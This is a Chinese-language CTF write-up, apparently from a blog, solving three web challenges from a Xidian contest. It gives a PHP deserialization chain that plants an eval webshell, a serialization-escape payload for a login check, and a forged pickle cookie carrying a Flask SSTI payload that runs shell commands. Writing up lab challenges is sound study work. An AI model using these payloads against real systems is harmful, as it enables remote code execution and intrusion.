首页 > 其他分享 >西电抗疫CTF(组队赛)

西电抗疫CTF(组队赛)

时间:2023-01-08 23:46:10浏览次数:49  
标签:__ function p1 var1 var2 电抗 组队 CTF class

前言

没想到第一次拿一血还是因为被做核酸叫起来,然后睡不着做的题!

Screenshot_20220110_175721_edit_569306001377192

Screenshot_20220110_175105_com.tencent.mobileqq_e

Web

ez_unserialize

源码:

<?php

class A
{
    public $var1;
    public $var2;
    public $secret;

    function __construct($p1, $p2)
    {
        $this->var1 = $p1;
        $this->var2 = $p2;
    }

    function __destruct()
    {
        $this->var1->secret = $this->var2;
    }
}

class B
{
    function __construct()
    {
        $this->Hello();
    }

    function __set($p1, $p2)
    {
        $p2->$p1();
    }

    function Hello()
    {
        echo "Welcome to 西电战役CTF!";
    }
}

class C
{
    public $var1;

    function __construct($p1)
    {
        $this->var1 = $p1;
    }

    function __call($p1, $p2)
    {
        call_user_func($this->var1);
    }
}

class D
{
    public $var1;
    public $var2;

    function __construct($p1, $p2)
    {
        $this->var1 = $p1;
        $this->var2 = $p2;
    }

    function write()
    {
        $dir = "sandbox";
        if (!is_dir($dir)) {
            mkdir('sandbox');
        }
        chdir('sandbox');
        $filename = md5($this->var1 . $_SERVER["REMOTE_ADDR"]) . ".php";

        if (preg_match("/[<>?]/", $this->var2)) {
            die("hhhhacker!!!");
        } else {
            file_put_contents("./" . $filename, $this->var2);
        }
    }
}

$a = $_GET['a'];

if (isset($a)) {
    unserialize($a);

} else if ($_POST['b'] == 'phpinfo') {
    phpinfo();
} else {
    highlight_file(__FILE__);
}

链子很好找,preg_match使用数组绕过即可

exp:

<?php
class A
{
    public $var1;
    public $var2;
    public $secret;
    function __construct()
    {
        $this->var1 = new B;
        $this->var2 = new C;
    }
}

class B
{
}

class C
{
    public $var1;
    function __construct()
    {
        $this->var1 = array(new D, "write");
    }
}

class D
{
    public $var1 = 'ggbond';
    public $var2 = ["shell"=>"<?php eval(\$_POST['cmd']);?>"];
}

$o = new A;
echo serialize($o);

login

登录页面直接爆破

image-20220110115204244

得到源码:

<?php
include('flag.php');
error_reporting(0);
function replace($payload){
    $filter="/flag/i";
    return preg_replace($filter,"nono!",$payload);
};
$sss=$_GET['ky'];
$ctf['sss1']='webwebweb';
$ctf['sss2']='pwnpwnpwn';
if(isset($sss)){
    if(strpos($sss,'flag')>=0){
        $ctf['sss1']=$sss;
        $ctf=unserialize(replace(serialize($ctf)));
        if($ctf['sss2']==="webwebweb"){
            echo $flag;
        }else{
            echo "nonono!";
        }
    }
}
else{
    highlight_file(__FILE__);
}
?>

序列化逃逸,值增长,构造exp

ky=flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";s:4:"sss2";s:9:"webwebweb";}

ez_flask

需要身份认证,看了下Cookie里有个user,查了一会发现是python的序列化字符串,捣鼓了半天才把exp捣鼓出来

app.py

class User:

    def __init__(self, name):
        self.name = name
        self.vip = True

exp.py

import app
from base64 import b64encode
from pickle import dumps

data = input(">>>")
o = app.User(data)
payload = dumps(o)
print("user=" + str(b64encode(payload))[2:-1])

然后接下来直接进行flaks SSTI

{{config.__class__.__init__.__globals__['os'].popen('cat /flag').read()}}

运行脚本

user=gASVcgAAAAAAAACMA2FwcJSMBFVzZXKUk5QpgZR9lCiMBG5hbWWUjEl7e2NvbmZpZy5fX2NsYXNzX18uX19pbml0X18uX19nbG9iYWxzX19bJ29zJ10ucG9wZW4oJ2NhdCAvZmxhZycpLnJlYWQoKX19lIwDdmlwlIh1Yi4=

得到的payload放入cookie得到flag

标签:__,function,p1,var1,var2,电抗,组队,CTF,class
From: https://www.cnblogs.com/seizer/p/17035761.html

相关文章

  • DNUICTF
    Web[签到]flag等一会后把内容复制下来,然后执行一下脚本:importreimportbase64flag=''f=open('flag.txt','r')content=f.read()foriinrange(20):......
  • SCTF2021
    Loginme有源码,没学过go,瞎看middleware.gopackagemiddlewareimport( "github.com/gin-gonic/gin")funcLocalRequired()gin.HandlerFunc{ returnfunc(c*gin.......
  • [BJDCTF2020]EzPHP
    [BJDCTF2020]EzPHP考点:php的各种bypassF12发现注释<!--GFXEIM3YFZYGQ4A=-->base32解密得到1nD3x.php,访问后得到源码Level1if($_SERVER){if(preg......
  • [GYCTF2020]Easyphp
    [GYCTF2020]Easyphp考点:反序列化的对象逃逸非常典型的登陆界面,随便输了输,发现存在admin用户,猜测是弱口令,拿字典跑了一遍,无果按照以往的做题经验,觉得可能有源码泄露,尝试/......
  • [HarekazeCTF2019]encode_and_encode
    [HarekazeCTF2019]encode_and_encode考点:json_decode的unicode编码绕过进入题目后,很容易就可以看到源码query.php<?phperror_reporting(0);if(isset($_GET['source'......
  • [MRCTF2020]Ezaudit
    [MRCTF2020]Ezaudit考点:php的伪随机数好复杂的页面,搜索了一下php、form等可能可以利用的字段无果,然后猜测有备份,果然尝试了一下www.zip,里面有一个index.php<?phpheade......
  • [NCTF2019]SQLi
    [NCTF2019]SQLi考点:sqlbypass一道sql题,非常友好的给出了sqlquery,但想必也不简单sqlquery:select*fromuserswhereusername='1'andpasswd='1'这中语句非常典......
  • [SWPUCTF 2018]SimplePHP
    [SWPUCTF2018]SimplePHP考点:1、PHP代码审计 2、Phar反序列化漏洞网站中有两个功能:查看文件和上传文件,利用查看文件将源码都先弄下来进行PHP代码审计。file.php<?php......
  • [SUCTF 2019]EasyWeb
    [SUCTF2019]EasyWeb考点:1、文件上传bypass 2、.htaccess的利用开局源代码<?phpfunctionget_the_flag(){//webadminwillremoveyouruploadfileevery20m......
  • re | [NPUCTF2020]芜湖
    re|[NPUCTF2020]芜湖......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99